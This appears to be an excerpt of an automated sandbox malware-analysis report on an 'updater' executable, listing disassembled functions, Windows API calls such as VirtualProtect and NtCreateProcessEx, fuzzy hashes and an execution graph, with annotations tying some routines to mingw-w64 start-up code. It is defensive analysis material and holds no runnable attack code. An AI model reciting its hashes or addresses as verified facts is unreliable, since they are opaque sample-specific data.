                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 3825114775-1499360005
                                          • Opcode ID: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction ID: 2589a8cd05da8d07ae2b6704229ba4a03d7328fb53ad9385f39614627ecf8bc3
                                          • Opcode Fuzzy Hash: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction Fuzzy Hash: F9412AB1A1DA4380FA11DB19E9543B923A1BF55780F5C4031CA8DEF7A2CE6EF855C320

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: memset$wcscatwcscpywcslen
                                          • String ID: $0$0$@$@
                                          • API String ID: 4263182637-1413854666
                                          • Opcode ID: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction ID: 70abc7af16247dadfbb75c072cf1fd6a69f6e3a49c542844c5fbf9c6e5cc38ce
                                          • Opcode Fuzzy Hash: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction Fuzzy Hash: 0BB1A36190C6C385F7218B15F8453BA77A0FF81348F184235EA8CAA6A5DF7EE946CB50

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                          • String ID: 0$X$`
                                          • API String ID: 329590056-2527496196
                                          • Opcode ID: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction ID: 18058d3439ad1f539b319c04b7c3d94572858084ea49902c1a70d1fadd04b806
                                          • Opcode Fuzzy Hash: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction Fuzzy Hash: 6402D472918BC281E720DB15E8403AA77A0FB85798F184235DAECAB7E5DF7ED544C710

                                          Control-flow Graph

                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1CC7
                                          • memcpy.MSVCRT ref: 00007FF6568E1CE0
                                          • GetLastError.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          These three format strings are the error messages of mingw-w64's pseudo-relocation runtime (__write_memory in pseudo-reloc.c), which makes an image page temporarily writable to apply a runtime relocation and then restores the original protection. The VirtualQuery, VirtualProtect, memcpy and GetLastError sequence in this function is therefore CRT start-up code present in every mingw-built binary, not a code-injection primitive; the VirtualProtect calls attributed to this function should not by themselves be read as evidence of self-modifying code.
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction ID: f6eb3d47a77dea73d88d3e2b59ed392b37de8c8908afac8a34823eb43475dc9f
                                          • Opcode Fuzzy Hash: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction Fuzzy Hash: 07417F61B08A4781EE618B55D8446B827A0FF85B84F5C4132CE4DEF7A5DE3EF946C320

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                          • String ID:
                                          • API String ID: 3326252324-0
                                          • Opcode ID: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction ID: 52c740b10f4de79b754b82f96fc44a56dedb1d5128c9d5d68308f1309cae0ec2
                                          • Opcode Fuzzy Hash: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction Fuzzy Hash: 8321EA60A1D51382FE2A9B41E9603746360BF15B90F5C0031C91DEB6A8DF6FBD56C320

                                          Control-flow Graph

                                          Control-flow graph for the function at 7ff6568e1e10 (graph image not reproduced; node listing summarised): three signal call sites and one internal call to 7ff6568e9f80. The executed/not-executed colouring of the rendered graph is not recoverable here.
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction ID: a770661c58c62cc81d5ced8608b760b5ce212888825e35231af4ea3e6d23dc37
                                          • Opcode Fuzzy Hash: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction Fuzzy Hash: CB21A432F0C50741FE755214959037911819F857A4F2D8531E99DEF3D8DEAEFC81C2A0

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen
                                          • String ID: 0$@
                                          • API String ID: 4088430540-1545510068
                                          • Opcode ID: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction ID: 7c49780f636fe9f230568af43c4ef52cfa10170ffbc8dddb34fcbda5dc8b7a8f
                                          • Opcode Fuzzy Hash: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction Fuzzy Hash: B2119A2252868182E720DB14F44679AA3B4FFD43A4F140124FA8C87BA8EF7ED54ACB40

                                          Control-flow Graph

                                          Control-flow graph for the function at 7ff6568e1880 (graph image not reproduced; node listing summarised): one direct VirtualProtect call and internal calls to 7ff6568e2420, 7ff6568e2660, 7ff6568e1d40 and 7ff6568e1ba0, the VirtualQuery/VirtualProtect/memcpy routine recorded above. This shape is consistent with mingw-w64's _pei386_runtime_relocator, which walks the pseudo-relocation table at start-up and patches image pages through that routine. The executed/not-executed colouring of the rendered graph is not recoverable here.
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6568E1247), ref: 00007FF6568E19F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction ID: b6dff9bd2314197a495dd6e8e2774d8dad8fb5961132f1e6b7fe6a57cdbb4662
                                          • Opcode Fuzzy Hash: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction Fuzzy Hash: 66516C62F18547C6EB109B22D8807B827A1EB15B98F5C4131D95CAF798CF3EEC96C720

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 388 7ff6568e1800-7ff6568e1810 389 7ff6568e1812-7ff6568e1822 388->389 390 7ff6568e1824 388->390 391 7ff6568e182b-7ff6568e1867 call 7ff6568e2290 fprintf 389->391 390->391
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction ID: 4d3e76a9d9829752076873053f93892e85892f41d57b59e0b68bbaf2f2510f08
                                          • Opcode Fuzzy Hash: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction Fuzzy Hash: 4FF0F611E18A8682E620DB64E9410BDA360FB597C1F489231EE8EFF251DF2DF982C310

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction ID: 97bf343ee977f8340ed42ab72c6d11a962ee5a0df3538e539a26f8d6a99efbdb
                                          • Opcode Fuzzy Hash: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction Fuzzy Hash: DF01EC25B0D60382FA269B51EE142746360BF15B91F5C0035CA1DEB6A4DF2FBD96C310

                                          Execution Graph

                                          Execution Coverage:5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:189
                                          Total number of Limit Nodes:2
                                          execution_graph 1148 7ff758ee1394 1152 7ff758ee99e0 1148->1152 1150 7ff758ee13b8 1151 7ff758ee13c6 NtCreateProcessEx 1150->1151 1153 7ff758ee99fe 1152->1153 1156 7ff758ee9a2b 1152->1156 1153->1150 1154 7ff758ee9ad3 1155 7ff758ee9aef malloc 1154->1155 1157 7ff758ee9b10 1155->1157 1156->1153 1156->1154 1157->1153 1260 7ff758ee1ad4 1261 7ff758ee1a70 1260->1261 1262 7ff758ee1b36 1261->1262 1265 7ff758ee199e 1261->1265 1268 7ff758ee1b5c 1261->1268 1263 7ff758ee1ba0 4 API calls 1262->1263 1266 7ff758ee1b53 1263->1266 1264 7ff758ee1a0f 1265->1264 1267 7ff758ee19e9 VirtualProtect 1265->1267 1267->1265 1194 7ff758ee1e10 1195 7ff758ee1e2f 1194->1195 1196 7ff758ee1eb5 1195->1196 1197 7ff758ee1ecc 1195->1197 1200 7ff758ee1e55 1195->1200 1197->1196 1198 7ff758ee1ed3 signal 1197->1198 1198->1196 1199 7ff758ee1ee4 1198->1199 1199->1196 1201 7ff758ee1eea signal 1199->1201 1200->1196 1202 7ff758ee1f12 signal 1200->1202 1201->1196 1202->1196 1271 7ff758ee1fd0 1272 7ff758ee1fe4 1271->1272 1273 7ff758ee2033 1271->1273 1272->1273 1274 7ff758ee1ffd EnterCriticalSection LeaveCriticalSection 1272->1274 1274->1273 1455 7ff758ee2050 1456 7ff758ee20cf 1455->1456 1457 7ff758ee205e EnterCriticalSection 1455->1457 1458 7ff758ee20c2 LeaveCriticalSection 1457->1458 1459 7ff758ee2079 1457->1459 1458->1456 1459->1458 1460 7ff758ee20bd free 1459->1460 1460->1458 1203 7ff758ee6a0f wcslen 1208 7ff758ee15a8 1203->1208 1210 7ff758ee1394 1208->1210 1211 7ff758ee99e0 malloc 1210->1211 1212 7ff758ee13b8 1211->1212 1213 7ff758ee13c6 NtCreateProcessEx 1212->1213 1299 7ff758ee118b 1300 7ff758ee1190 1299->1300 1301 7ff758ee11b9 _amsg_exit 1299->1301 1300->1301 1303 7ff758ee11a0 Sleep 1300->1303 1304 7ff758ee11fa 1301->1304 1303->1300 1303->1301 1305 7ff758ee1201 _initterm 1304->1305 1306 7ff758ee121a 1304->1306 1305->1306 1307 7ff758ee1880 5 API calls 1306->1307 1308 7ff758ee1247 SetUnhandledExceptionFilter 1307->1308 1309 7ff758ee126a 1308->1309 1310 7ff758ee126f 
malloc 1309->1310 1311 7ff758ee128b 1310->1311 1312 7ff758ee12a0 strlen malloc memcpy 1311->1312 1312->1312 1313 7ff758ee12d0 1312->1313 1314 7ff758ee132d _cexit 1313->1314 1315 7ff758ee1338 1313->1315 1314->1315 1316 7ff758ee2f88 1319 7ff758ee14a9 1316->1319 1320 7ff758ee1394 2 API calls 1319->1320 1461 7ff758ee1f47 1462 7ff758ee1e67 signal 1461->1462 1464 7ff758ee1e99 1461->1464 1463 7ff758ee1e7c 1462->1463 1462->1464 1463->1464 1465 7ff758ee1e82 signal 1463->1465 1465->1464 1214 7ff758ee1404 1215 7ff758ee1394 2 API calls 1214->1215 1216 7ff758ee1413 1215->1216 1217 7ff758ee1394 2 API calls 1216->1217 1218 7ff758ee2104 1219 7ff758ee2111 EnterCriticalSection 1218->1219 1221 7ff758ee2218 1218->1221 1220 7ff758ee220b LeaveCriticalSection 1219->1220 1226 7ff758ee212e 1219->1226 1220->1221 1222 7ff758ee2272 1221->1222 1224 7ff758ee2241 DeleteCriticalSection 1221->1224 1225 7ff758ee2230 free 1221->1225 1223 7ff758ee214d TlsGetValue GetLastError 1223->1226 1224->1222 1225->1224 1225->1225 1226->1220 1226->1223 1275 7ff758ee1ac3 1276 7ff758ee1a70 1275->1276 1277 7ff758ee1b5c 1276->1277 1278 7ff758ee1b36 1276->1278 1281 7ff758ee199e 1276->1281 1279 7ff758ee1ba0 4 API calls 1278->1279 1283 7ff758ee1b53 1279->1283 1280 7ff758ee1a0f 1281->1280 1282 7ff758ee19e9 VirtualProtect 1281->1282 1282->1281 1283->1283 1325 7ff758ee6586 1330 7ff758ee2df0 1325->1330 1342 7ff758ee2660 1330->1342 1332 7ff758ee2e00 memset 1333 7ff758ee2e3c 1332->1333 1344 7ff758ee2690 1333->1344 1343 7ff758ee266f 1342->1343 1343->1332 1343->1343 1379 7ff758ee155d 1344->1379 1380 7ff758ee1394 2 API calls 1379->1380 1227 7ff758ee1000 1228 7ff758ee108b __set_app_type 1227->1228 1229 7ff758ee1040 1227->1229 1231 7ff758ee10b6 1228->1231 1229->1228 1230 7ff758ee10e5 1231->1230 1233 7ff758ee1e00 1231->1233 1234 7ff758ee9f70 __setusermatherr 1233->1234 1235 7ff758ee1800 1236 7ff758ee1812 1235->1236 1237 7ff758ee1835 fprintf 1236->1237 1381 7ff758ee6779 1382 7ff758ee6786 1381->1382 1383 7ff758ee6820 wcslen 
1381->1383 1382->1383 1430 7ff758ee153f 1383->1430 1431 7ff758ee1394 2 API calls 1430->1431 1432 7ff758ee154e 1431->1432 1433 7ff758ee1394 2 API calls 1432->1433 1284 7ff758ee1ab3 1285 7ff758ee1a70 1284->1285 1285->1284 1286 7ff758ee1b36 1285->1286 1287 7ff758ee199e 1285->1287 1292 7ff758ee1b5c 1285->1292 1288 7ff758ee1ba0 4 API calls 1286->1288 1289 7ff758ee1a0f 1287->1289 1291 7ff758ee19e9 VirtualProtect 1287->1291 1290 7ff758ee1b53 1288->1290 1291->1287 1238 7ff758ee38f0 wcslen 1246 7ff758ee157b 1238->1246 1247 7ff758ee1394 2 API calls 1246->1247 1434 7ff758ee1a70 1435 7ff758ee199e 1434->1435 1439 7ff758ee1a7d 1434->1439 1436 7ff758ee1a0f 1435->1436 1437 7ff758ee19e9 VirtualProtect 1435->1437 1437->1435 1438 7ff758ee1b5c 1439->1434 1439->1438 1440 7ff758ee1b36 1439->1440 1441 7ff758ee1ba0 4 API calls 1440->1441 1442 7ff758ee1b53 1441->1442 1443 7ff758ee216f 1444 7ff758ee2185 1443->1444 1445 7ff758ee2178 InitializeCriticalSection 1443->1445 1445->1444 1448 7ff758ee146d 1449 7ff758ee1394 2 API calls 1448->1449 1248 7ff758ee15e4 1249 7ff758ee1394 2 API calls 1248->1249 1250 7ff758ee15f3 1249->1250 1450 7ff758ee1e65 1451 7ff758ee1e67 signal 1450->1451 1452 7ff758ee1e7c 1451->1452 1454 7ff758ee1e99 1451->1454 1453 7ff758ee1e82 signal 1452->1453 1452->1454 1453->1454 1472 7ff758ee2320 strlen 1473 7ff758ee2337 1472->1473 1293 7ff758ee219e 1294 7ff758ee2272 1293->1294 1295 7ff758ee21ab EnterCriticalSection 1293->1295 1296 7ff758ee2265 LeaveCriticalSection 1295->1296 1297 7ff758ee21c8 1295->1297 1296->1294 1297->1296 1298 7ff758ee21e9 TlsGetValue GetLastError 1297->1298 1298->1297 1158 7ff758ee11d8 1159 7ff758ee11fa 1158->1159 1160 7ff758ee1201 _initterm 1159->1160 1161 7ff758ee121a 1159->1161 1160->1161 1171 7ff758ee1880 1161->1171 1164 7ff758ee126a 1165 7ff758ee126f malloc 1164->1165 1166 7ff758ee128b 1165->1166 1167 7ff758ee12a0 strlen malloc memcpy 1166->1167 1167->1167 1168 7ff758ee12d0 1167->1168 1169 7ff758ee132d _cexit 1168->1169 1170 7ff758ee1338 1168->1170 
1169->1170 1172 7ff758ee1247 SetUnhandledExceptionFilter 1171->1172 1173 7ff758ee18a2 1171->1173 1172->1164 1173->1172 1174 7ff758ee194d 1173->1174 1179 7ff758ee1a20 1173->1179 1175 7ff758ee1956 1174->1175 1176 7ff758ee199e 1174->1176 1175->1176 1184 7ff758ee1ba0 1175->1184 1176->1172 1178 7ff758ee19e9 VirtualProtect 1176->1178 1178->1176 1179->1176 1180 7ff758ee1b5c 1179->1180 1181 7ff758ee1b36 1179->1181 1182 7ff758ee1ba0 4 API calls 1181->1182 1183 7ff758ee1b53 1182->1183 1185 7ff758ee1bc2 1184->1185 1187 7ff758ee1c45 VirtualQuery 1185->1187 1188 7ff758ee1cf4 1185->1188 1192 7ff758ee1c04 memcpy 1185->1192 1187->1188 1193 7ff758ee1c72 1187->1193 1189 7ff758ee1d23 GetLastError 1188->1189 1191 7ff758ee1d37 1189->1191 1190 7ff758ee1ca4 VirtualProtect 1190->1189 1190->1192 1192->1175 1193->1190 1193->1192

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 2643109117-1499360005
                                          • Opcode ID: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction ID: 6779d160945330fb0f0576d1f307988473e9cc7e184e70d4f1ac8f496929340a
                                          • Opcode Fuzzy Hash: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction Fuzzy Hash: 14414C75E0966282FA10BF15E951379E7B1AF49781FDC403ACA0D4B7A1DF3CA491C328

                                          Control-flow Graph

                                          APIs
                                          • NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF758EE1156), ref: 00007FF758EE13F7
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmp
